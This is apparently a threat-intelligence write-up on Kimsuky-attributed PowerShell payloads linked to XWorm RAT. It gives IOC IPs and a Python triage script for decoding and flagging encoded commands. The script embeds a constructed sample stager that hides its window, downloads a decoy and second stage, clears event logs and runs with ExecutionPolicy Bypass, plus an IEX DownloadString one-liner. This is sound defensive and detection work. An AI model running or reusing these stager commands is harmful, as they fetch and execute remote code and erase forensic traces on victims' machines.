Analysis of Kimsuky APT Group (Powershell Payloads one of them attributed to XWorm RAT)

2025-05-12 Shubho57

https://medium.com/@shubhandrew/analysis-of-kimsuky-apt-group-powershell-payloads-one-of-them-attributed-to-xworm-rat-ea8a96ea53fe

The Medium analysis reviews two Base64-encoded PowerShell payloads attributed to Kimsuky-related activity, one of which the author ties to XWorm RAT. After decoding, the scripts show staged behavior: PowerShell and CMD execution, fileless or obfuscated script execution, download of archives and executables from a single malicious IP, display of a decoy PDF to the victim, and launching of later-stage scripts with -ExecutionPolicy Bypass. The write-up also notes hiding of the process window through Win32 API calls (consistent with the inline C# ShowWindow pattern the YARA rule below is named for), registry and system discovery, disruption of event logging, and C2 communication for payload retrieval or attacker commands. Although the evidence rests on the analyst's own description and figures rather than shared samples, the distinctive CTI value is the overlap between Kimsuky-labelled PowerShell staging and commodity RAT-style remote access behavior.

Indicators of Compromise

Type   Value                            First Seen   Last Seen
YARA   Inline_CSharp_ShowWindow_Hider   2025-05-12   2025-05-12
IPv4   92.119.114.128                   2025-05-12   2025-05-12
IPv4   185.235.128.114                  2025-05-12   2025-05-12
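The staging behaviors summarized above (Base64-encoded command, -ExecutionPolicy Bypass, window hiding via an inline C# ShowWindow import, decoy PDF, download from a single host, event log clearing) are the things an analyst pulls out of a decoded payload first. The triage script below is an added example, not code from the Medium write-up or from the Kimsuky payloads; it decodes an -EncodedCommand style blob (UTF-16LE, falling back to UTF-8 for FromBase64String blobs) and extracts network indicators and the behavior markers the analysis and the Inline_CSharp_ShowWindow_Hider YARA rule describe. The stager it runs on is a constructed sample in the style described, using the RFC 5737 documentation address 192.0.2.10 rather than the IPs listed above.

```python
import base64
import re

# Constructed sample stager in the style the write-up describes. The host, paths
# and file names are placeholders (192.0.2.10 is a documentation address), not
# content recovered from the real payloads.
SAMPLE_STAGER = r'''
Add-Type -Name Win -Namespace N -MemberDefinition '[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr h, int c);'
[N.Win]::ShowWindow((Get-Process -Id $PID).MainWindowHandle, 0)
Invoke-WebRequest -Uri "http://192.0.2.10/files/decoy.pdf" -OutFile "$env:TEMP\decoy.pdf"
Start-Process "$env:TEMP\decoy.pdf"
Invoke-WebRequest -Uri "http://192.0.2.10/files/stage2.zip" -OutFile "$env:TEMP\s2.zip"
wevtutil cl "Windows PowerShell"
cmd /c powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "$env:TEMP\stage2.ps1"
'''


def encode_command(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Two encodings of the same kind of blob an analyst meets in the wild.
ENCODED_UTF16 = encode_command(SAMPLE_STAGER)
ENCODED_UTF8 = base64.b64encode(
    b"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Decode a Base64 PowerShell blob, detecting UTF-16LE by its zero high bytes."""
    raw = base64.b64decode(b64)
    # -EncodedCommand payloads are UTF-16LE, so for ASCII-heavy scripts every
    # odd byte is 0x00; inline [Convert]::FromBase64String blobs are usually UTF-8.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://[^\s\"']+")

# Behavior markers taken from the staging steps the analysis describes.
BEHAVIOURS = {
    "execution_policy_bypass": re.compile(r"-(?:Exec(?:utionPolicy)?|ep)\s+Bypass", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden|ShowWindow\s*\(", re.I),
    # Inline C# P/Invoke of user32!ShowWindow via Add-Type, the pattern the
    # Inline_CSharp_ShowWindow_Hider rule name points at.
    "inline_csharp_showwindow": re.compile(r"Add-Type[^\n]*DllImport[^\n]*ShowWindow", re.I),
    "event_log_clear": re.compile(r"wevtutil\s+cl\b|Clear-EventLog", re.I),
    "download": re.compile(r"Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer", re.I),
    "decoy_document": re.compile(r"Start-Process\s+\"?[^\"\n]*\.pdf", re.I),
}


def triage(b64: str) -> dict:
    """Decode a blob and return the indicators and behavior markers found in it."""
    script = decode_encoded_command(b64)
    return {
        "ips": sorted(set(IPV4.findall(script))),
        "urls": sorted(set(URL.findall(script))),
        "behaviours": sorted(name for name, rx in BEHAVIOURS.items() if rx.search(script)),
    }


if __name__ == "__main__":
    for label, blob in (("utf16 stager", ENCODED_UTF16), ("utf8 one-liner", ENCODED_UTF8)):
        print(label, triage(blob))
```

The decoder chooses UTF-16LE by counting zero high bytes rather than by trusting the caller, because the same Base64 string can appear as an -EncodedCommand argument or inside a FromBase64String call; the behavior markers are deliberately loose regexes meant for first-pass triage of a decoded script, not for production detection, where the URL and IP hits should be checked against the hosting infrastructure before being promoted to indicators.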
